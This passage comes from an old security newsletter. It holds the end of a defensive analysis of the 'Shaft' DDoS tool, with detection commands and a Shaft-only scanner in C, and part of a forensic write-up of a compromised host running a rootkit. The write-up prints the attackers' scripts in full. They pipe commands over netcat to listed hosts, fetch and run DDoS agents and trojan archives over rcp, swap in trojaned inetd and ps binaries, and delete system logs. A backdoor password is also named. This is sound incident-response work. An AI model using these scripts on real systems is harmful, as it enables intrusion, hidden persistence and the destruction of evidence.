This may imply "rcp" or "ftp" connections during the initial
intrusion phase (see also [5]).
The program uses UDP traffic for its communication between the handlers
and the agents. Considering that the traffic is not encrypted, it can
easily be detected based on certain keywords. Performing an "ngrep" [11]
for the keywords mentioned in the syntax sections (3.3.1 and 3.3.2), will
locate the control traffic, and looking for TCP packets with sequence
numbers of 0x28374839 may locate the TCP SYN packet flood traffic.
Source ports are always above 1024, and source IP numbers can
include zeroes in the leading octet.
Strings in this control traffic can be detected with the "ngrep"
program using the same technique shown in [5], [6], and [7]. For
example,
# ngrep -i -x "alive tijgu" udp
# ngrep -i -x "pktres|pktstat" udp
will locate the control traffic between the handler and the agent,
independently of the port number used.
There are also two excellent scanners for detecting DDoS agents on the
network: Dittrich's "dds" [8] and Brumley's "rid" [2].
"dds" was written to provide a more portable and less dependant
means of scanning for various DDoS tools. (Many people encountered
problems with Perl and the Net::RawIP library [15] on their systems,
which prevented them from using the scripts provided in [5], [6],
and [7].) Due to time contraints during coding, "dds" does not have
the flexibility necessary to specify arbitrary protocols, ports, and
payloads. A modified version of "dds", geared towards detecting only
"Shaft" agents, is included in the Appendix.
A better means of detecting "Shaft" handlers and agents would be to
use a program like "rid", which uses a more flexible configuration
file mechanism to define ports, protocols, and payloads.
A sample configuration for "rid" to detect the "Shaft" control traffic
as described:
start shaft
send udp dport=18753 data="alive tijgu hi 5 1918"
recv udp sport=20433 data="alive" nmatch=1
end shaft
-- 3.6 Defenses
---------------
To protect against the effects of the multiple types of denial of
service, we suggest that you review the other papers (see [1, 3, 5, 6,
7]) and other methods of dealing with DDoS attacks being discussed
and promoted (see [9]).
For example, rate-limiting is considered effective against ICMP packet
flooding attacks, while anti-spoof filters and egress filters at the
border routers can limit the problems caused by attacking agents
faking source addresses.
-- 4. Further evolution
-----------------------
While the author(s) of this tool did not pursue the use of encryption
of its control traffic, such an evolution is conceivable, since a Caesar
cipher is used to obfuscate the password. A transition to Blowfish or
other stream ciphers is realistic, and changing the communication protocol
to ICMP, much like TFN, is conceivable. The use of multicast protocols
for both communication or packet flooding is also possible.
To date, no source for the "Shaft" handler ("shaftmaster") has been
obtained of analyzed.
At this stage, the code is believed to be private. This would mean that
the authors could likely change defaults and the probability of detecting
"script kiddie" copycats using default values as analyzed here is low.
This would argue for rapid and widespread detection efforts to identify
agents before this change.
-- 5. Conclusion
----------------
"Shaft" is another DDoS variant with independent origins. The code
recovered did appear to be still in development. Several key
features indicate evolutionary trends as the genre develops.
Of significance is the priority placed on packet generation
statistics which would allow host selection to be refined. The
analysis of the code and binary was greatly enhanced by the capture
of attack preparation and command packets. The captured packets
made it possible to assess the impact of a single agent that managed
to saturate the network pipe.
The version analyzed had hooks which would allow for dynamic changes
to the master host and control port but not the agent control port.
However such items are trivially incorporated and must not be taken
to be indicative of any current versions which may be in active use.
The obfuscation of master IP, ports and passwords used a relatively
simple form of encryption but this could easily be strengthened.
The detection of DDoS installations will become very much more
difficult as such metamorphosis techniques progress, the presence of
such agents will still be more readily determined by analysis of
traffic anomalies with a consequent pressure on time and resources
for site administrators and security teams.
-- APPENDIX A: References
-------------------------
[1] Barlow, Jason and Woody Thrower. TFN2K An Analysis
http://www2.axent.com/swat/News/TFN2k_Analysis.htm
[2] Brumley, David. Remote Intrusion Detector.
http://theorygroup.com/Software/RID
[3] CERT Distributed System Intruder Tools Workshop report
http://www.cert.org/reports/dsit_workshop.pdf
[4] CERT Advisory CA-99-17 Denial-of-Service Tools
http://www.cert.org/advisories/CA-99-17-denial-of-service-tools.html
[5] Dittrich, David. The DoS Project's "trinoo" distributed denial of service attack tool
http://staff.washington.edu/dittrich/misc/trinoo.analysis
[6] Dittrich, David. The "Tribe Flood Network" distributed denial of service attack tool
http://staff.washington.edu/dittrich/misc/tfn.analysis
[7] Dittrich, David. The "Stacheldraht" distributed denial of service attack tool
http://staff.washington.edu/dittrich/misc/stacheldraht.analysis
[8] Dittrich, David, Marcus Ranum, George Weaver, David Brumley et al.
http://staff.washington.edu/dittrich/dds
[9] Dittrich, David, Distributed Denial of Service (DDoS) Attacks/Tools
http://staff.washington.edu/dittrich/misc/ddos/
[10] lsof:
http://vic.cc.purdue.edu/
[11] ngrep:
http://www.packetfactory.net/ngrep/
[12] Packet Storm Security, Distributed denial of service attack tools
http://packetstorm.securify.com/distributed/
[13] Phrack Magazine, Volume Seven, Issue Forty-Nine,
File 06 of 16, [ Project Loki ]
http://www.phrack.com/search.phtml?view&article=p49-6
[14] Phrack Magazine Volume 7, Issue 51 September 01, 1997,
article 06 of 17 [ L O K I 2 (the implementation) ]
http://www.phrack.com/search.phtml?view&article=p51-6
[15] Net::RawIP:
http://quake.skif.net/RawIP
[16] tcpdump:
ftp://ftp.ee.lbl.gov/tcpdump.tar.Z
[17] Schneier, Bruce. Applied Cryptography, 2nd edition, Wiley.
[18] Stevens, W. Richard and Gary R. Wright. TCP/IP Illustrated, Vol. I, II,
and III., Addison-Wesley.
[19] Zuckerman, M.J. Net hackers develop destructive new tools. USA Today,
7 December 1999.
http://www.usatoday.com/life/cyber/tech/review/crg681.htm
-- APPENDIX B: dds ("Shaft" only variant)
/*
* dds $Revision: 1.6s $ - a distributed DoS tool scanner - Shaft only
*
* Based on the gag scanner, written by David Dittrich, University
* of Washington, Marcus Ranum, Network Flight Recorder, with
* code contributed by others, and based on an idea stolen from
* George Weaver, Pennsylvania State University.
*
* Dave Dittrich <dittrich@cac.washington.edu>
* Marcus Ranum <mjr@nfr.net>
* George Weaver <gmw@psu.edu>
* David Brumley <dbrumley@rtfm.stanford.edu>
*/
/* Shaft only version, modified to that effect by
* Sven Dietrich <spock@sled.gsfc.nasa.gov>
*/
#if YOU_HAVE_NOT_READ_THIS_YET
This software should only be used in compliance with all applicable laws and
the policies and preferences of the owners of any networks, systems, or hosts
scanned with the software
The developers and licensors of the software provide the software on an "as
is" basis, excluding all express or implied warranties, and will not be liable
for any damages arising out of or relating to use of the software.
THIS SOFTWARE IS MADE AVAILABLE "AS IS", AND THE UNIVERSITY OF WASHINGTON
DISCLAIMS ALL WARRANTIES, EXPRESS OR IMPLIED, WITH REGARD TO THIS SOFTWARE,
INCLUDING WITHOUT LIMITATION ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND
FITNESS FOR A PARTICULAR PURPOSE, AND IN NO EVENT SHALL THE UNIVERSITY OF
WASHINGTON BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR ANY
DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
ACTION OF CONTRACT, TORT (INCLUDING NEGLIGENCE) OR STRICT LIABILITY, ARISING
OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
#endif
#define VERSION "$Revision: 1.6s $"
#include <stdlib.h>
#include <ctype.h>
#include <signal.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/wait.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/udp.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <netinet/ip_icmp.h>
#define BS 1024
#define __FAVOR_BSD
/* The two arrays below are for address range calculations. They
should have been automatically generated, but
1) I am lazy.
2) There are a few special cases in them.
I will not scan more than a /16. When we do scan a CIDR block, we
assume that it actually is a CIDR block, and do not scan the
network or broadcast address.
*/
static unsigned long MaskBits[] = {
0x00000000, /* /0 */
0x00000000, /* /1 */
0x00000000, /* /2 */
0x00000000, /* /3 */
0x00000000, /* /4 */
0x00000000, /* /5 */
0x00000000, /* /6 */
0x00000000, /* /7 */
0x00000000, /* /8 */
0x00000000, /* /9 */
0x00000000, /* /10 */
0x00000000, /* /11 */
0x00000000, /* /12 */
0x00000000, /* /13 */
0x00000000, /* /14 */
0x00000000, /* /15 */
0xffff0000, /* /16, Class B */
0xffff8000, /* /17, 128 * Class C */
0xffffc000, /* /18, 64 * Class C */
0xffffe000, /* /19, 32 * Class C */
0xfffff000, /* /20, 16 * Class C */
0xfffff800, /* /21, 8 * Class C */
0xfffffc00, /* /22, 4 * Class C */
0xfffffe00, /* /23, 2* Class C */
0xffffff00, /* /24, Class C */
0xffffff80, /* /25, 128 hosts */
0xffffffc0, /* /26, 64 hosts */
0xffffffe0, /* /27, 32 hosts */
0xfffffff0, /* /28, 16 hosts */
0xfffffff8, /* /29, 8 hosts */
0xfffffffc, /* /30, 4 hosts (PPP link) */
0xfffffffe, /* /31, invalid */
0xffffffff, /* /32, host */
};
static int NumHosts[] = {
0, 0, 0, 0,
0, 0, 0, 0,
0, 0, 0, 0,
0, 0, 0, 0, /* don't scan more than a /16 */
65534, /* These are all -2 so that we don't
scan the broadcast addr or the
network addr */
32766,
16382,
8190,
4094,
2046,
1022,
510,
254,
126,
62,
30,
14,
6,
2,
0,
1,
};
extern char *optarg;
struct udppkt_t {
struct ip ipi;
struct udphdr udpi;
char buffer[BS];
} udppkt;
static void listener();
static int usage();
static int vflg = 0; /* verbosity */
static int dflg = 0; /* debugging */
/* shaft variables */
static short shaft_dstport = 18753; /* handler listen port */
static short shaft_rctport = 20433; /* agent listen port */
char shaft_scmd[] = "alive";
char shaft_spass[] = "tijgu";
char shaft_echostr[] = "alive";
int
main(int argc, char **argv)
{
int pid, host;
char target[128];
unsigned long target_host;
struct in_addr target_ip;
int mask;
char * mask_ptr;
int result;
int usock;
char buf[BS];
struct sockaddr_in
usa;
int i;
char *jnk1;
char *jnk2;
int sleepytime = 500;
int bigsleep = 30;
int num_hosts;
char scmd[BS], spass[BS], sbuf[BS];
while((i = getopt(argc,argv,"ds:S:v")) != -1) {
switch(i) {
case 'd':
dflg++;
break;
case 's':
sleepytime = atoi(optarg);
if(sleepytime <= 0) {
fprintf(stderr,"WARNING: zero interping sleep time will probably overflow your sy
stem's transmit buffers and yield poor results\n");
sleepytime = 1;
}
break;
case 'S':
bigsleep = atoi(optarg);
if(bigsleep <= 0) {
fprintf(stderr,"WARNING: negative sleep value - staying with default of %d\n", bi
gsleep);
}
break;
case 'v':
vflg++;
break;
default:
exit(usage());
}
}
if(optind >= argc || argc - optind > 1)
exit(usage());
mask_ptr = strchr(argv[optind], '/');
/* if a CIDR block is passed in */
if (mask_ptr) {
*mask_ptr = '\0';
mask_ptr ++;
sscanf(mask_ptr, "%d", &mask);
} else {
printf("No mask passed, assuming host scan (/32)\n");
mask = 32;
}
result = inet_aton(argv[optind], &target_ip);
if (result == 0) {
fprintf(stderr, "%s: Bad IP address: %s\n", argv[0],
argv[optind]);
exit(-1);
}
if (mask < 16) {
fprintf(stderr, "Bad Network Admin! Bad! Do not scan more than a /16 at once!\n");
exit(-1);
}
num_hosts = NumHosts[mask];
if (num_hosts == 0) {
fprintf(stderr, "Cannot scan a /%d. Exiting...\n", mask);
exit(-1);
}
if(vflg) {
printf("Mask: %d\n", mask);
printf("Target: %s\n", inet_ntoa(target_ip));
printf("dds %s - scanning...\n\n", VERSION);
}
sprintf(sbuf,"%s %s hi 5 1918",shaft_scmd,shaft_spass);
target_host = ntohl(target_ip.s_addr);
target_host &= MaskBits[mask];
target_ip.s_addr = htonl(target_host);
if((pid = fork()) < 0) {
perror("cannot fork");
exit(1);
}
/* child side listens for return packets */
if (pid == 0)
listener();
sleep(1);
/* main sweep loop - COULD be expanded to whole Internet but... */
/* but that would be _very_ bad.... */
while (num_hosts) {
if (mask != 32) {
target_host ++;
}
target_ip.s_addr = htonl(target_host);
num_hosts--;
/* we really need to skip the network and broadcast addresses */
if ((target_host & 0xff) == 0 || (target_host & 0xff) == 0xff) {
if(vflg)
printf("Skipping special address %s\n", inet_ntoa(target_ip));
continue;
}
if(vflg)
printf("Probing address %s\n", inet_ntoa(target_ip));
/* shaft check */
bzero((char *) &usa, sizeof(usa));
usa.sin_family = AF_INET;
usa.sin_addr.s_addr = target_ip.s_addr;
usa.sin_port = htons(shaft_dstport);
if (dflg)
fprintf(stderr,"Sending UDP to: %s\n",
inet_ntoa(usa.sin_addr));
if ((usock = socket(AF_INET, SOCK_DGRAM, 0)) < 0) {
perror("cannot open UDP socket");
exit(1);
}
i = sendto(usock,sbuf,strlen(sbuf), 0,
(struct sockaddr *)&usa,
sizeof(usa));
if (i < 0) {
char ebuf[BS];
sprintf(ebuf,"sendto: udp %s",
inet_ntoa(usa.sin_addr));
perror(ebuf);
break;
}
close(usock);
usleep(sleepytime);
}
/* wait for any late responses */
if (dflg)
fprintf(stderr,"Waiting %d seconds for late responses.\n",
bigsleep);
sleep(bigsleep);
/* shut listener. if this fails the listener exits on its own */
(void)kill(pid, SIGHUP);
exit(0);
}
static void listener()
{
int usock;
int i, len;
fd_set fdset;
char buf[BS];
char rcmd[BS], filler[BS], rpass[BS];
struct timeval timi;
struct udppkt_t
upacket;
struct sockaddr_in
sa, from;
/* child becomes a listener process */
if ((usock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) < 0) {
perror("cannot open raw UDP listen socket");
exit(1);
}
bzero((char *) &sa, sizeof(sa));
sa.sin_family = AF_INET;
sa.sin_addr.s_addr = INADDR_ANY;
sa.sin_port = htons(shaft_rctport);
if (bind(usock, (struct sockaddr *)&sa, sizeof(sa)) < 0) {
perror("cannot bind to socket");
exit(-1);
}
while (1) {
/* if parent has exitted, die */
if(getppid() == 1)
exit(0);
FD_ZERO(&fdset);
FD_SET(usock, &fdset);
timi.tv_sec = 1;
timi.tv_usec = 0;
select(FD_SETSIZE, &fdset, NULL, NULL, &timi);
usleep(100);
if (FD_ISSET (usock, &fdset)) {
/* read data from UDP listen socket */
memset((void *) &upacket, 0, sizeof(struct udppkt_t));
len = sizeof(from);
#if 1
if ((i = recvfrom(usock, buf, BS, 0,
(struct sockaddr *) &from, &len)) < 0) {
perror("recvfrom");
continue;
}
#else
i = read (usock, (char *) buf, BS) -
(sizeof (struct ip) + sizeof (struct udphdr));
#endif
sa.sin_addr.s_addr = upacket.ipi.ip_src.s_addr;
if(dflg)
fprintf(stderr,
"Listener got a UDP packet on port %s\n",
shaft_rctport);
/* shaft check */
if (strstr(buf,shaft_echostr)) {
printf("Received '%s' from %s",
shaft_echostr,
inet_ntoa(from.sin_addr));
printf(" - probable shaft agent\n");
}
else {
printf("Unexpected UDP packet received on port %d from %s\n",
shaft_rctport, inet_ntoa(from.sin_addr));
}
}
}
}
static int
usage()
{
fprintf(stderr,"usage: dds [options] <target>\n");
fprintf(stderr,"target is CIDR block to scan in form:\n");
fprintf(stderr,"\tA.B.C.D/mask\n");
fprintf(stderr,"Options:\n");
fprintf(stderr,"\t[-v] turns on verbosity\n");
fprintf(stderr,"\t[-d] turns on debugging\n");
fprintf(stderr,"\t[-s] interpacket sleep in microseconds\n");
fprintf(stderr,"\t[-S] delay for late packets\n");
return(1);
}
---
Dr. Sven Dietrich Raytheon ITSS | spock@sled.gsfc.nasa.gov
ESDIS Project, Code 586, Blg 32 Rm N231 | +1-301-614-5119 | 614-5270 Fax
NASA Goddard Space Flight Center | Greenbelt, MD 20771, USA
@HWA
111.1 Shaft Node/Master analysis by Rick Wash & Jose Nazario
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Source: PSS
--J/dobhs11T7y2rNN
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: quoted-printable
---[ ]---
Analysis of a Shaft Node and Master
March 26, 2000
---[ ]---
Rick Wash
rlw6@po.cwru.edu
Jose Nazario
jose@biocserver.cwru.edu
Section 0: Introduction
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
This analysis is in addition to Sven Dietrich's analysis, dated March 16, 2=
000,
of the Shaft DDoS tool. The analysis we provide here is a description of t=
he
rootkit used and the methods of distribution of the tool. We share this=20
information so that other site and system administrators can examine their
systems for comprimise and use as Shaft nodes.=20
Note: This file can be found at:
http://biocserver.cwru.edu/~jose/shaft_analysis/
The user names and host ID's have been munged. We have tried to contact the
domain admins whose networks have appeared anywhere in any of these files.
---------[ How We Found This Information
Once we were alerted that our machine may have been compromised, we perform=
ed
both network and host based scans. A network port scan (using nmap) reveal=
ed
port 5002/tcp open and listening. Furthermore, it revealed port 22/tcp (ss=
h)
open, which was not installed by the system administrator.
A host based scan revealed similarly that port 5002/tcp was listening. An
analysis with rpm -Va revealed differences in sizes and MD5 sums for the
components of the root kit, but did not reveal the Shaft toolkit. At this =
time
the system was taken offline and the disk was mounted in another trusted sy=
stem
and analyzed from there. =20
Local administrators had noted that the system had become unstable over aut=
umn,
corresponding to the tests of the Shaft DDoS tool. =20
Section 1: The Rootkit Used
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D
----------------[ What We Found
=20
One of the significant things we found while analyzing the box was a direct=
ory
and set of files that I will call the sda69 toolkit. It was found in /dev
(/dev/sda69 and 4 files sda69[a-d]). This appears to be the attackers work=
ing
directory, so most of their scripts and files are stored there.
It appears that much of their older work from when they originally compromi=
sed=20
the box was stored in a subdirectory called ". " (dot space, "/dev/sda69/. =
").
This directory contained 6 files that compromised a system for sniffing the
ethernet network and analyzing the sniffer logs. Here is a list of files a=
nd
what they do:
-rwxr-xr-x 1 0 20 28969 Apr 4 1999 idle
This was their sniffer. It was designed to sniff ports 21/tcp and 23/tcp (=
ftp=20
and telnet, respectively). It was capture the first x number of bytes of e=
ach
connection, log them to a file, and move on to the next connection. This w=
as
used to gather passwords, since both ftp and telnet send passwords over
plaintext. This sniffer only logged in one direction (the data flowing from
the machine that started the connection to the destination machine). This =
was
done because the other direction rarely contains useful information. The
output file in this case was tcp.log. The program was named idle probably =
to
fool any sysadmin who noticed it in ps and make them believe it was just id=
le
time.
-rw-r--r-- 1 0 0 456799 Jun 11 1999 tcp.log
This was their sniffer log. It contained data in the form:
src_ip =3D> dst_ip [port]
data
=2E..
----- [method of connection termination]
This log only contained information for ports 21 and 23. It did also conta=
in a
number of passwords.
-rwxr-xr-x 1 0 0 2795 May 12 1999 pp.pl
This was a perl script that extracted usernames and passwords from their
sniffer log files.
-rw-r--r-- 1 0 0 6 Apr 28 1999 sniff.pid
This is a standard pid lock file for the sniffer.=20
-rw-r--r-- 1 0 20 7654 Apr 4 1999 s
A simple SYN flood program.
-rwxrwxr-x 1 0 0 7656 Aug 28 1998 chattr
This is the standard linux chattr program, linked dynamically against libc6=
. =20
This material in ". " shows that the attackers did use this box for sniffing
passwords from the ethernet network that it was connected to. It is curren=
tly
unknown if the attackers did any thing else during this time frame (May-June
1999).
--------[ Linux Trojan Horse Programs Found
Investigation of the Linux host comprimised yielded the following trojan
horse programs. They were found by mounting the disc read-only and without
executable permissions set. A full recursive file listing was then=20
performed (ls -lartRi /mnt) which quickly revealed the trojan horse binarie=
s:
20563 -rwxrwxr-x 1 root root 437428 Sep 15 1998 vi
20554 -rwxrwxr-x 1 root root 262756 Oct 2 1998 tcsh
313370 -r-xrwxr-x 1 root root 31312 Oct 3 1998 ps
Examination of the binaries using strings(1), together with additional files
on the system, reveals the method of operation of the new binaries.=20
The file sizes were sometimes larger, most likely due to being statically
linked against an older C library (libc5 on a libc6 system).
On a running host, examination by using RPM in verify mode (rpm -Va) showed
file sizes, permissions and MD5 sums were off when compared to the database
on the system.=20
ls
The ls trojan we found has the effect of not listing files listed in a=20
hidden configuration file, /dev/sda69c. As such, it's highly extensible.=20
Several utiities were hidden, including elements of the Shaft toolkit and
even some terminals.
netstat
Examination of the replaced netstat binary reveals that it is used to
hide connections to or from certain networks and on certain ports. The
networks and ports were configured using the file /dev/sda69b, an additional
element of the rootkit.
ps
Again, used to hide activity. The trojan horse ps(1) binary makes a referen=
ce
to the file /dev/sda69a, which contains a listing of processes and terminals
to hide. A fairly typical rootkit listing, including sniffers, scanners,
the eggdrop IRC script, and the backdoored sshd.
updatedb
The program updatedb(1L), normally a link to slocate(1), was replaced with=
=20
shell script. Again, used to hide signs of the rootkit tools.
locate
Similar to updatedb's trojan, used to hide the rootkit and Shaft toolkit.
find
Again, used to hide the toolkits, calls the file /dev/sda69c in a similar
way to the ls trojan to hide files.
dir
vdir
See ls, used in the same fashion.
killall
Replaced, calls /dev/sda69a, a listing of processes and terminals. Used to
prevent the halting of the intruder's processes.=20
syslogd
Replaced, calls /dev/sda69d, a list of domains. Presumably it prevents logg=
ing
when hosts from these domains connect.
tcpd
The TCP wrappers executable, calls /dev/sda69b and prevents access checking
from those networks and on those ports.
inetd
Appears to be a combined portmapper and inetd daemon, perhaps to allow for
access or system control via RPC calls.
sshd
Trojaned sshd 1.2.26, static linked against libc5. Contains a backdoor
password "rOOTkIT" which yeilds a root shell without logging.
ifconfig
Replaced, with the trojan version omitting any reporting of the PROMISC=20
setting, hiding the use of the sniffing software.
-----------[ Solaris SPARC Trojans Found
During the course of our investigation into the toolkit, we also found seve=
ral
key binaries for Solaris as trojan horse programs. Witin the archive (neet.=
tar)
there is a script plus several binary replacement for the SPARC acrhitectur=
e.
The script installs an inetd trojan, a ps and update trojan as well. These
are then run. Log wiping is also done. System comprimise is presumably
through a known exploit. We performed no real analysis on the trojan horse
programs for SPARC as we did not examine a Solaris node of the Shaft tool.
-rwx------ 1 510 510 39544 Mar 18 1999 doc
This appears to be their trojaned SPARC Solaris inetd binary.
-rwx------ 1 510 510 24356 Mar 18 1999 ps
This appears to be their trojaned SPARC Solaris ps binary.
-rwx------ 1 510 510 25548 Mar 18 1999 update
Solaris does not use update, though SunOS 4.x did. This is probably to=20
confuse the administrator should they stumble across the file. According to
George Weaver <weaver@gabriel.nso.psu.edu> this is a standard solsniffer, a
Solaris sniffer. The logfiles are expected to be in /usr/man/tmp/output on=
=20
infected Solaris boxes. =20
----------[ Trojan Executable Configuration Files
In addition to these files, four more files were recovered that appear to
contain information used by the rootkit that was installed on this system.
These files are /dev/sda69[a-d]. Here is a listing of what is contained in
these files:
sda69a
This file has the format:
<number> <name>
where number indicates what type of information follows (always either 1 or=
3)
and name indicates the data. For this file, 1 indicates that what follows =
is a
terminal name, and 3 indicates that what follows is a executable name. This
file is used by the trojaned ps and killall to prevend the sysadmin from se=
eing
or killing the executables listed here, or anything from the listed termina=
ls.
The contents of the file:
3 egg
3 linsniffer
1 p0
1 p1
3 sniffer
3 mscan
3 bash
3 idle
3 screen
3 ssynk4
3 sshd
3 ssh
3 sshd1
3 s
sda69b
=20
The format of this file is the same as the format of sda69a, but the conten=
ts
differ. The 1 in this case means that the data is a subnet to ignore. The=
3
in this case is a specific port number. This file is used by the trojaned
netstat and tcpd to know which IP's to hide, which IP's to always let in,
and which ports to hide. An example contents follows:
1 xxx.
3 6667
1 yyy.
3 23
1 zzz.
1 ddd.eee
1 ccc.
3 513
1 bbb.aaa.
3 22
Here, the three letter combinations represent single numbers from IP addres=
ses.=20
This file would specify that everyone from xxx.*.*.* would be allowed in th=
is
machine, and no connections from these IP's would appear in netstat. Also,
programs listening on ports 6667, 23, 513, and 22 (irc, telnet, rlogin, and
ssh) would not appear in a normal netstat.
sda69c
This file is a list of files, one file per line, that were installed on this
system by the attackers. This file is used by ls, dir, vdir, and find to k=
now
what files not to list when the admin tries to look through the filesystem.
sda69d
This file is a list of providers, one per line. This file is used by the
trojaned syslog to know what messages should not be logged.
Section 2: Distribution Methods of the Shaft Toolkit
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D
Their more recent work (which includes working with the Shaft DDoS tool) is=
all
in the base sda69 directory (/dev/sda69). Here is a list of files recovered
and what the do:
-rwxr-xr-x 1 0 0 25123 Nov 28 14:34 shaftmaster
-rwxr-xr-x 1 0 0 15184 Nov 28 14:47 shaftnode
This is the master and node executables for the Shaft DDoS tool. For more
information, see: http://sled.gsfc.nasa.gov/~spock/shaft_analysis.txt
-rwxr-xr-x 1 0 0 19806 Nov 28 14:41 shaftnode.c
This is the source file for the Shaft node program. More information can be
found at the same location as above. =20
-rwxr-xr-x 1 0 0 165632 Nov 28 16:34 nc
This appears to be the standard netcat executable. This executable was=20
used by the scripts to remotely execute commands.
-rw-r--r-- 1 0 0 596 Nov 28 17:12 hitlist
This file contains a list of target machines, one machine per line. These
were evidently targets to receive the shaftnode program, having previously
been compromised.
-rwxr-xr-x 1 0 0 84 Nov 28 16:36 dos.sh
This shell script run the command dospipe.sh and sends the output to each of
the IP's in the file hitlist, port 21 (ftp). This script is a wrapper arou=
nd
dospipe.sh that executes it for each of the machines in hitlist and sends i=
t to
the machine. Here is the code from that file:
#!/bin/sh
for i in `cat hitlist` ; do (./dospipe.sh | ./nc -p 53982 $i 21 &) ; done
-rwxr-xr-x 1 0 0 186 Nov 28 16:41 dospipe.sh
This shell script outputs a series of commands that are intended to upload =
and
run a copy of their shaftnode executable to the target machine. This script
automates the process of uploading and running their node executables. Her=
e is
the code for the script:
#!/bin/sh
echo "oir##t"
echo "QUIT"
sleep 5
echo "cd /tmp"
sleep 5
echo "rcp user@host:shaftnode ./"
sleep 5
echo "chmod +x shaftnode"
sleep 5
echo "./shaftnode"
echo "exit"
The first couple lines (the first two echo commands) appear to signify that=
a
backdoor is being used on the target machines' ftp servers to get the roots=
hell
they need. The first two lines are sent to the trojanned ftp server, and t=
he=20
following lines appear to be commands send to a root shell.
-rwxr-xr-x 1 0 0 122880 Oct 24 02:13 duh.tar
This is a tar file archive of the next five files: bd.sh, bdpipe.sh, massbd=
.sh,
neet.tar and unf.
-rwxr-xr-x 1 0 0 104 Oct 24 01:55 unf
This file is another list of IP's, presumably a list of targets for this "b=
d"
system.
-rwxr-xr-x 1 0 0 10240 Oct 24 02:11 bd.sh
This, despite its file extension, is a tar file containing the two files
bdpipe.sh and massbd.sh. I believe that this being a tar file is a mistake=
and
that is should be a shell script that resembles the script dos.sh.
-rwxr-xr-x 1 0 0 53 Aug 7 1999 massbd.sh
This is a shell script that iterates through all of the lines in a file and
runs the scripts bd.sh on each of them in the background. This means that =
it
runs bd.sh on each of the lines in the file roughly at the same time. I
suppose that the file unf is used for this purpose. Here is the code for t=
he
script:
#!/bin/sh
for i in `cat $1`; do (./bd.sh $i &);done
-rwxr-xr-x 1 0 0 192 Aug 8 1999 bdpipe.sh
This is a file that is used to upload and install their trojans and rootkit=
s on
a SPARC machine, as well as delete the logs and such. It copies neet.tar o=
ver
to the target machine, run the script bd, and cleans up their work. Here is
the code for the script:
#!/bin/sh
echo "cd /tmp;"
echo "rcp user@host:neet.tar ./;"
sleep 4
echo "tar -xvf neet.tar;"
sleep 4
echo "./bd;"
sleep 10
echo "rm -rf neet.tar bd update*;"
sleep 10
echo "exit;"
It appears that they already have a root shell by the time this script is r=
un.
Getting the root shell could very well be the contents of the real bd.sh.
-rwxr-xr-x 1 0 0 102400 Aug 7 1999 neet.tar
This is a tar file that contains 4 other files: bd (a shell script), ps,
update, and doc (three SPARC executables).
-rwx------ 1 510 510 1076 Aug 5 1999 bd
This is a shell script. This is the executable that is run by the other
scripts once a system is compromised. This script does a number of things.
First of all it copies in its trojaned version of inetd. Secondly it remov=
es
most of the log files on the system that would implicate them. Then it runs
their trojaned inetd and tests it with a telnet session (presumably to test=
the
backdoor). Then is kills inetd, nfs, and ttdb. Next it runs their update
program. Finally it copies their ps program to replace the current system o=
ne.
Here is the full source of this script:
unset HISTFILE; unset SAVEHIST
cp doc /usr/sbin/inetd;
chown root /usr/sbin/inetd;
chgrp root /usr/sbin/inetd;
touch 0716000097 /usr/sbin/inetd;
rm -rf doc /tmp/bob /var/adm/messages /usr/lib/nfs/statd /usr/openwin/bin/r=
pc.ttdb* /usr/dt/bin/rpc.ttdb*
rm -rf /var/log/messages /var/adm/sec* /var/adm/mail* /var/log/mail* /var/a=
dm/sec*
rm -rf /usr/openwin/bin/rpc.cmsd
rm -rf /usr/dt/bin/rpc.cmsd
/usr/sbin/inetd -s;
/usr/sbin/inetd -s;
telnet localhost;
/usr/sbin/inetd -s;
ps -ef | grep inetd | grep bob | awk '{print "kill -9 " $2 }' > boo
chmod 700 boo
=2E/boo
ps -ef | grep nfs | grep statd | awk '{print "kill -9 " $2 }' > boo
chmod 700 boo
=2E/boo
ps -ef | grep ttdb | grep -v grep | awk '{print "kill -9 " $2 }' > boo
chmod 700 boo
=2E/boo
rm -rf boo
mkdir /usr/man/tmp
mv update ps /usr/man/tmp
cd /usr/man/tmp
echo 1 \"./update -s -o output\" > /kernel/pssys
chmod 755 ps update
=2E/update -s -o output &
cp ps /usr/ucb/ps
mv ps /usr/bin/ps
touch 0716000097 /usr/bin/ps /usr/ucb/ps
cd /
ps -ef | grep bob | grep -v grep
ps -ef | grep stat | grep -v grep
ps -ef | grep update
Section 3: What You Can Do
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D
We have, we hope, outlined methods for administrators to examine their
systems for compromise by the distributors of the Shaft DDoS tool. A=20
combination of a generic rootkit together with the DDoS package created
a ring of machines which could be used to disrupt large network segments.
The most important thing is what is repeatedly said -- apply the vendor=20
patches for security updates and keep your system current. Access was gaine=
d,
no doubt, through well known holes which had patches released some time bef=
ore
by the vendor. This simple action would have prevented most of the nodes
of the tool form being acquired.
Secondly, any alert system administrator would have noticed the performance
of the machine degrade for no appearant reason. The local administrators of
this node complained of crashes and performance problems of this server, yet
were not qualified administrators. This is a standard problem, and one that
